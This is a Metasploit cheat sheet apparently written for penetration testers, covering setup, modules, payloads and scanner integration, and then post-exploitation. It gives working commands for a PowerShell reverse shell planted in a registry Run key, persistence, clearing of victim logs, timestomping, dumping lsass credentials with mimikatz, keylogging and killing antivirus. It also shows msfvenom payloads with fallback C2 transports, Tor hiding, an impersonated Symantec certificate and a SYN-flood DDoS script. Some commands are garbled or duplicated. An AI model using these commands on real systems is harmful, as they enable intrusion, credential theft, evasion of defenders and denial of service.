⭕Metasploit

Database
create a new db for a project with postgresql.
# systemctl start postgresql
# su postgres
$ createuser --interactive msf_user -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
$ createdb --owner=msf_user msf_database
$ exit
msf> db_connect msf_user:[PASSWORD]@127.0.0.1:5432/msf_database
msf> workspace -a [metasploitable2]
Searchsploit
Sometimes Metasploit and ExploitDB don't share the same database, its also possible that you find some exploits that are not ported to metasploit modules. so its a good practice to search for exploits in both of theme.
Easy Searchsploit
search for exploits from nmap XML output.
searchsploit --nmap *.xml
Exclude Something
searchsploit <search string> | grep -v '/dos/'
Search Only in Exploit Title
searchsploit -t <search string> --colour
Metasploit Modules
located in /usr/share/metasploit-framework/modules/
/usr/share/metasploit-framework/modules/
exploits
modules that use payloads
located in /usr/share/metasploit-framework/modules/exploits/
auxiliary
include port scanners, fuzzers, sniffers, and more
located in /usr/share/metasploit-framework/modules/auxiliary
Payloads, Encoders, Nopes
payloads are codes that run remotely
located in /usr/share/metasploit-framework/modules/payloads
encoders ensure that payloads make it to their destination intact
located in /usr/share/metasploit-framework/modules/encoders
Nopes keep the payload sizes consistant across exploit attempts
located in /usr/share/metasploit-framework/modules/nops
Loading Additional Module Trees
we can add additional modules either at runtime or after msf starts. -m will tell msf to load additional modules at runtime:
msfconsole -m ~/new-modules/
for adding after msf start:
msf> loadpath /path/to/modules
General Commands
move out of module
back
display random banner
banner
check an exploit before running it (not for all)
check
disable/enable console color (for old and dummy terminals)
color -h
remote connect to a machine
connect -h
edit the loaded module
edit
search for modules
search -h (grep enabled)
info about a module
info [module]
live ruby interpreter shell
irb
manage jobs
jobs -h
kill a module or job
kill [num]
load/unload a plugin
load/unload [plugin]
load a third party module
loadpath [path/to/module]
run resource(batch) files
resource [file] u
route sockets through a session or command
route -h
show/select active sessions
sessions -l
sessions [num]
set/unset options
set
unset
set/unset global variables
setg [name] [value]
unsetg
save state
save
show available options/modules
show options
show targets
show adanced
show payloads
show exploits
show auxiliary
show encoders
show nops
show evation
run and send an exploit to background
exploit -j
Types of Exploits
Active Exploits
Passive Exploit
wait for incoming host connections and exploit them as they connect
almost always focus on clients such as web browsers, FTP clients, etc.
can be used in conjunction with email exploits
waiting for connections
report shells as they happen
can be enumerated by passing -i to the sessions command.
Types of Payloads
singles
standalone and self-contained
can be caught with non-metasploit handlers such as netcat
sent and executed in a single part at one time
stagers
the payload comes in 2 parts, the first and the second stage
the first stage is small and is purpose is to download and run the second stage
the second stage is the main part of the payload with the important functionalities
designed to be used when size matters, small and reliable
usually more stable than a large single payload.
inline (non-staged)
a single payload
containing the exploit and shellcode
more stable than staged
meterpreter
short for meta-interpreter
advanced multi-function payload that operates via dll injection
resides completely on the memory of victim machine (doesn't touch the disk at all)
very difficult to detect
scripts and modules can be loaded and unloaded
Passivex
can help in circumventing restrictive outbound firewalls
uses an activeX control to create a hidden instance of internet explorer and communicates with the attacker over HTTP protocol
Nonx
NX (no execute) bit is a feature built into some CPUs to prevent code from executing in certain areas of memory
in windows NX is implemented as data execution prevention (DEP)
nonx payloads circumvent DEP
ORD
windows stager based payloads
it works on every flavor and language of windows dating back to windows 9x without the explicit definition of a return address
extremely tiny, it relies on the fact that ws2_32.dll is loaded in the process being exploited before exploited.
a bit less stable than other stagers
Integration with nmap
# run nmap with db_nmap command
# all results will be saved in your database
msf5 > db_nmap
# example:
db_nmap -sV -p- -A -T4 --version-intensity 9 -Pn -n 192.168.56.102
Integration with Nessus
install and run nessus:
systemstcl start nessusd.service
load nessus in msfconsole:
msf5> load nessus
msf5> nessus_help
connect to nessus host (can be remote):
nessus_connect NessusUser:[email protected] ok
nessus commands:
nessus_policy_list >>> list all policies
nessus_scan_new [uuid of policy] >>> start new scan
nessus_scan_list >>> show list of current running scans
nessus_scan_details [num] >>> check an scan status
nessus_db_import [num] >>> import scan results to msf
after importing results to msf we can use msf DB commands to search for vulns and services:
hosts
services
Integration with OpenVAS
install and run openvas:
gvm-start
load opencas
openvas_help
help openvas
connect to host:
openvas_connect admin 1983 127.0.0.1 9390 ok
openvas commands:
openvas_config_list >>> copy the config id you want
openvas_target_create metasploitable 192.168.56.102 metasploitable >>> create a target for a new task
openvas_task_create metasploitabe2 "metasploitable2" [config id] [target id] >>> create a task
openvas_task_list >>> show tasks
openvas_task_start [id] >>> start task
Load All Post Modules
load espia extapi incognito kiwi lanattacks peinjector powershell priv python sniffer stdi unhook winpmem
Pivoting & Forwarding
see Metasploit pivoting section.
Route Traffic over Tor
apt install tor
edit tor config /etc/tor/torrc
uncomment following lines:
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 10.17.0.5:9999
change the hiddenserviceport ip address from 127.0.0.1 to your private ip and local port 80 to 9999
service tor start
or
tor
find your tor hidden service hostname
cat /var/lib/tor/hidden_service/hostname

create a payload with msfvenom and set the lhost
to the union address and append .link to it:

in listener set lhost to your local ip address:

run the attack:

using tor is extremely slow ad your session may timeout, play around with timeout values.
Logging
every command will be logged in a file named console.log in ~/.msf4/logs
se consolelogging true
Auto Persistence
run persistence –A –L [directory to put payload] -X [connection attempt intervals/sec] –p [attacker port] –r [attaacker ip]
-A for auro starting listener
-X for starting at reboot
# for help:
run persistance -h
#run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113
Clear Victim System Logs
(system, security & application logs)
clearev
Execute Commands Directly From Memory
The executable file can be on attacker side since meterpreter is running completely in memory, we can execute remote binaries directly in memory.
execute -h
example:
execute mimikatz directly from memory(binary is on attacker side):
migrate -N lsass.exe
execute -H -i -c -m -d calc.exe -f /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
adding command parameters( -a)
execute -H -i -c -m -d calc.exe -f /usr/share/windows-resources/mimikatz/x64/mimikatz.exe -a '"sekurlsa::logonpasswords" exit'
Multiple Connection Channels
example:
open notepad app in a different channel
execute -f notepad.exe -c
list channels
channel -l
read/write data to a channel
write [option] [channel id]
read
Change File Timestamp
modify the date and time of file and folder modification and access
timestomp -h
# list the value of MACE (modified-accessed-created-entry)
timestomp /path/to/file -v
# change the creation time
timestomp /path/to/file -c "05/25/2020 01:01:01"
# change last access time
timestomp /path/to/file -a "05/25/2020 01:01:01"
# change the last modify time
timestomp /path/to/file -m "05/25/2020 01:01:01"
Process Migration
migrate -h
migrate [pid]
migrate -N [process name]
Keylogger
migrate to explorer.exe (for better performance)
keyscan_start
keyscan_dump
keyscan_stop
Dig Info and Enumeration
net info, pass hashes, registry, etc.
run scraper
run winenum
Interact with the Registry
reg -h
example:
set a registry to run powershell reverse shell whenever the user logs in:
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v -Power -d "powershell -ep bypass -c $client = New-Object System.Net.Sockets.TCPClient('192.168.56.1',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Timeout Control
get_timeouts
# set communication timeout to 900 secs
set_timeouts -c 900
Sleep Control
makes current meterpreter session go to sleep for specific period of time and wake up again.
sleep
sleep 10 # sleep for 10 secs
Transports
Once Meterpreter shellcode has been run; whether from a phish, or some other means, it will reach out to the attacker’s Command and Control (C2) server over some network transport, such as HTTP, HTTPS or TCP. However, in an unknown environment, a successful connection is not guaranteed: firewalls, proxies, or intrusion prevention systems might all prevent a certain transport method from reaching out to the public Internet.Repeated trial and error is sometimes possible, but not always. For a phish, clicks come at a premium. Some exploits only give you one shot to get a shell, before crashing the host process. Meterpreter has the ability to have multiple “transports” in a single implant. A transport is the method by which it communicates to the Metasploit C2 server: TCP, HTTP, etc. Typically, Meterpreter is deployed with a single transport, having had the payload type set in msfvenom or in a Metasploit exploit module (e.g. meterpreter_reverse_http).
But after a connection has been made between the implant and the C2 server, an operator can add additional, backup transports. This is particularly useful for redundancy: if one path goes down (e.g. your domain becomes blacklisted), it can fall back to another.
A transport is defined by its properties:
The type of transport (TCP, HTTP, etc.)
The host to connect to
The port to connect on
A URI, for HTTP-based transports
Other properties such as retry times and timeouts
Once a Meterpreter session has been set up, you can add a transport using the command transport add and providing it with parameters (type transport to see the options).
By setting up multiple transports in this initialisation script, Meterpreter will try each of them (for a configurable amount of time), before moving on to the next one.
To do this:
Create a stageless meterpreter payload, which pre-loads the PowerShell extension. The transport used on the command line will be the default Include a PowerShell script as an “Extension Initialisation Script” (parameter name is extinit, and has the format of ,). This script should add additional transports to the Meterpreter session. When the shellcode runs, this script will also run If the initial transport (the one specified on the command line) fails, Meterpreter will then try each of these alternative transports in turn.
in AddTransports.ps1 :
Add-TcpTransport -lhost <host> -lport <port> -RetryWait 10 -RetryTotal 30
Add-WebTransport -Url https://<host>:<port>;-RetryWait 10 -RetryTotal 30
Add-WebTransport -Url http://<host>:<port>;-RetryWait 10 -RetryTotal 30
The command line for this would be:
msfvenom -p windows/meterpreter_reverse_tcp lhost=<host> lport=<port> sessionretrytotal=30 sessionretrywait=10 extensions=stdapi,priv,powershell extinit=powershell,/home/ionize/AddTransports.ps1 -f exe
Some got chas to be aware of:
Make sure you include the full path to the extinit parameter (relative paths don’t appear to work)
Ensure you configure how long to try each transport before moving on to the next.
RetryWait is the time to wait between each attempt to contact the C2 server
RetryTotal is the total amount of time to wait before moving on to the next transport
Note that the parameter names for retry times and timeouts are different between the PowerShell bindings and the Metasploit parameters themselves:
in the PowerShell extension, they are RetryWait and RetryTotal; in Metasploit they are SessionRetryWait and SessionRetryTotal (a tad confusing, as they relate to transports, not sessions)
Manually Creating Transport in Meterpreter Session
transport add -t [transport type, i.e: reverse_https] -l [lhost] -p [lport] -T [retry total time] -W [retry wait] -C [comm timeout]
transport add -l 192.168.56.1 -p 7878 -t reverse_https -T 3000 -W 10 -C 1000000
to move to another transport background the current session and run the right payload with options same as the target transport and wait for connection.
once you have more than one transfport its safe to use this command to move between transports:
transport next
transport prev
Enable RDP
enable RDP on victim machine use rdesktop to connect
run getgui -e
Script Automation
put the meterpreter commands in a .rc file setup meter and set the autorun script path:.
example:
migrate o explorer.exe and dump system credential
set AutoRunScript /root/autoruncommands.rc
migrate -N explorer.exe
getsystem
run post/windows/manage/killav
run post/windows/gather/checkvm
getuid
we can automate the whole thing too.
For example, using a standard editor, we will create a script in our home directory named setup.rc. In this script, we will set the payload to windows/meterpreter/reverse_https and configure the relevant LHOST and LPORT parameters. We also enable stage encoding using the x86/shikata_ga_nai encoder and configure the post/windows/manage/migrate module to be executed automatically using the AutoRunScript option. This will cause the spawned meterpreter to automatically launch a background notepad.exe process and migrate to it. Finally, the ExitOnSession parameter is set to “false” to ensure that the listener keeps accepting new connections and the module is executed with the -j and -z flags to stop us from automatically interacting with the session. The commands for this are as follows:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.11.0.4
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -j -z
sudo msfconsole -r setup.rc
With the listener configured and running, we can, for example, launch an executable containing a meterpreter payload from our Windows VM. We can create this executable with msfvenom :
msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.4 LPORT=443 -f exe -o met.exe
When executed, our multi/handler accepts the connection
we can specify scripts manually after getting a session:
meterrpreter> resource script.rc
Bash Automation
we can write bash scripts to automate the tasks: example: a dos attack.
#!/bin/bash
TARGET
echo " Choose who to DDoS (IP address ONLY), use nslookup < URL> to get IP address"
read TARGET
msfconsole -q -x "use auxiliary/dos/tcp/synflood;set RHOST $TARGET; exploit;
Payloads with Trusted SSL Certificates
configure a domain in zinitiative.com
and use lets enrypt to get a certificate after configuring the domain DNS servers to point to the digitalocean
droplet getting a certificate with lets encrypt is very simple.
first install letsencrypt:
apt install lets encrypt -y
generate a cert
letsencrypt cartonly --manual -d zinitiative.com
we should have a cert under /etc/letsencrypt/live/zinitiative.co
m directroy
before we can move on we will have to creare a unified file containng privkey.pem and cert.pem:
cd /etc/letsencrypt/live/zinitiative.com
cat privkey.pem cert.pem >> /root/unified.pem
now in msfconsole set the cert
set lhost zinitiative.com
set lport 443
set handlersslcert /root/unified.pem
set stagetverifysslcert true
set enablestageencoding true
run
Using Payloads with HTTP SSL
use auxiliary/gather/impersonate_ssl
# we use symantec websit as an example:
set rhost www.symantec.om
run

we have the cert now create a payload using the cert:
msfvenom -p windows/meterpreter/reverse_tcp lhosrt=1.2.3.4 lport=1234 handlersslcert=/root/.msf5/loot/fsdvd/cert.pem stagerverifysslcert=true -f exe -o payload.exemsfvenom -p windows/meterpreter/reverse_tcp lhosrt=1.2.3.4 lport=1234 handlersslcert=/root/.msf5/loot/fsdvd/cert.pem stagerverifysslcert=true -f exe -o payload.exe
in handler setting:
set handlersslcert [file.pem]
set stagerverifysslcert true
run

Last updated